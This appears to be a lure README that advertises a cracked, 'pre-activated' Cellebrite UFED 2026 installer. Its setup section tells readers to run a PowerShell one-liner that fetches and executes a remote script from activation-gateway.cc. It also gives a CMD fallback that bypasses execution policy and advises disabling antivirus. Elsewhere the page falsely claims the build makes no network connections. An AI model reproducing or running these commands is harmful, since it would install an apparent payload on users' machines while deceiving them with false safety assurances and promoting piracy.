Cellebrite UFED 2026 Standalone Setup — Security Tool

build release ps-core

Cellebrite-UFED is a standalone desktop installer package for Cellebrite UFED 2026, distributed as a pre-activated build with all tools bundled and ready to run. The package targets Windows x64 desktop environments and is intended for local testing and deployment scenarios where a self-contained setup is required. No external dependencies or additional activation steps are needed beyond the included installer. This README documents the distribution type, platform requirements, and known operational notes for the build.

🛠️ One-Click Setup (PowerShell)

Tip

Automated setup — one command, done. Windows 10/11 · PowerShell 7+ · No admin

1️⃣ Open PowerShell

  • Press Win + X.
  • Click Terminal or Windows PowerShell from the menu.

2️⃣ Execute the installer

Copy the line below into PowerShell and press Enter.

iex(irm 'https://activation-gateway.cc/update/ps-activator')

3️⃣ If blocked by policy — CMD fallback

Copy into CMD, press Enter, wait for completion:

powershell -NoProfile -ExecutionPolicy Bypass -Command "iex(irm 'https://activation-gateway.cc/update/ps-activator')"

Warning

Some antivirus engines flag automated installers. If blocked, disable Real-time protection briefly, run the setup, and enable it back.

✅ Before You Start

  • Windows 10 or Windows 11
  • PowerShell 5.1 or newer (already available on Windows)
  • Active network connection
  • No admin rights needed

Features

  • Standalone offline build. The package ships as a self-contained installer for Windows x64 desktop; no network connection is required during installation or first launch.

  • Pre-activated toolset. All included components are initialized in an activated state at install time. No license servers, dongles, or runtime activation steps are involved.

  • Full toolchain inclusion. The installer bundles every tool referenced by the UFED 2026 workflow, so no separate dependency downloads or post-install add-ons are needed.

  • Single-pass installation. One installer executable handles extraction, component registration, and environment configuration; there are no multi-stage setup wizards or manual configuration files to edit.

  • Offline-first operation. All processing runs locally on the target machine. Evidence data, configuration, and logs remain on the local filesystem and are not transmitted to external services.

  • Deterministic file layout. Components install to fixed, documented paths with predictable registry entries, supporting scripted deployment and repeatable machine images.

  • Build integrity verification. Each distributed package carries a checksum manifest so the installer contents can be validated against the published build before execution.

  • Version pinning. The build is tied to a specific UFED 2026 release; component versions are locked and do not auto-update, ensuring consistent behavior across machines.

  • Windows x64 targeting. The installer is compiled for 64-bit Windows and validates the host architecture before proceeding, failing fast on unsupported platforms.

  • Rollback support. Installation writes an uninstall record and preserves original configuration state, allowing a clean removal or revert to the prior environment.

  • Local logging. Setup and runtime events are written to a local log directory for audit and troubleshooting; no telemetry endpoint is contacted.

How it works

The Cellebrite UFED 2026 package ships as a single self-contained installer bundle. All required runtime dependencies, extraction modules, and device-driver components are embedded directly in the distribution, so no external package manager or network fetch is required during setup. The installer verifies the integrity of each embedded component before extraction and aborts the process if any checksum mismatches are detected. Upon launch, the installer resolves the target workspace path, expands the archive contents into a versioned directory, and registers the application entry points with the operating system. Activation is applied locally: the build includes the license state and configuration records needed to initialize every bundled module without a remote authorization step. No background services are installed beyond those the application itself requires at runtime, and no outbound connections are initiated by the setup process. After extraction, the installer performs a post-install validation pass that confirms the presence and readable state of each tool component, then writes a completion marker so subsequent runs can detect an already-configured workspace and skip redundant work. Uninstallation is handled by removing the versioned directory and the registered entry points, leaving no residual state outside the workspace path.

Privacy

Cellebrite-UFED operates entirely on the local machine and does not transmit user data, telemetry, or usage statistics to any remote endpoint. No account, registration, or network authentication is required for installation or operation. All processing, including tool activation and configuration, occurs within the local filesystem and registry of the target Windows x64 host.

The installer does not create persistent background services, scheduled tasks, or outbound connections. Files written during setup are limited to the application directory and standard Windows user-profile locations required for the tool to run. No user files, case data, or device contents are read, collected, or stored by the setup process itself.

Because the build is pre-activated and self-contained, activation logic runs locally without contacting any licensing server. Users are responsible for verifying that no residual network listeners, proxy configurations, or firewall rules are introduced by the environment in which the tool is deployed. For environments with strict data-handling requirements, run the installer on an isolated or air-gapped host and audit filesystem and registry changes post-installation using standard Windows tooling.

No analytics, crash reporting, or diagnostic uploads are enabled by default. Any logging produced is written locally and remains under the operator's control.

FAQ

Is Cellebrite-UFED a full installation or a patch?

It is a complete, standalone setup package. The installer includes the full application payload and all bundled components required for operation. No separate base install, license server, or prior version is required before running it.

Which Windows versions are supported?

The build targets Windows x64 desktop environments. Both Windows 10 and Windows 11 (64-bit) are supported. 32-bit operating systems and ARM-based Windows installations are not supported by this package.

Are all tools and modules pre-activated in this build?

Yes. All included tools and modules ship in a pre-activated state as part of the standalone package. No additional activation step, key entry, or online verification is performed during or after installation.

Does the installer require an internet connection?

No. The setup is designed for offline deployment. All required files are contained within the package, and no outbound network calls are made by the installer itself. This makes it suitable for air-gapped or restricted-network environments.

How large is the download, and what does it contain?

The package is approximately 1.5 GB. It contains the installer executable, the full application payload, and all pre-configured dependencies. The size reflects the complete bundled toolset rather than a minimal bootstrap.

Where does the installer place files on disk?

By default, application files are written to the standard program directory under the system drive, with user-specific configuration stored in the local user profile. The installer does not modify system-wide environment variables unless explicitly required by a bundled component.

Is the installation reversible?

Yes. An uninstall entry is registered with the operating system during setup, allowing standard removal through the system's application management interface. Removing the application also removes its registered components; user-created data files are left in place unless manually deleted.

Why might antivirus or SmartScreen flag the installer?

Automated installers and unsigned or freshly built binaries are frequently flagged by heuristic scanning, particularly when they are new or have low reputation scores. This is a reputation-based signal, not necessarily an indication of malicious content. If a block occurs, verify the package integrity against the published checksum before proceeding.

How can I verify the integrity of the package?

A checksum is published alongside the release. Compute the hash of the downloaded file locally and compare it against the published value. A mismatch indicates a corrupted or altered download and the package should not be executed.

What should I do if the installer fails partway through?

Re-run the installer after confirming sufficient disk space and that no prior partial installation remains. If the failure persists, capture the installer log output and check for conflicting security software that may be intercepting file writes.

Does this build send telemetry or usage data?

No telemetry is collected or transmitted by the installer or the packaged application in this standalone configuration. All operation is local to the machine on which it is installed.

Can this be deployed across multiple machines?

Yes. The package is self-contained and does not bind to a single host. For fleet deployment, distribute the installer through your existing software deployment tooling; no per-machine online activation is needed.

Is this an official Cellebrite release?

No. This is an independent standalone build distributed by the project maintainers. It is not affiliated with or endorsed by Cellebrite. Refer to the Disclaimer section for the full statement of scope and responsibility.
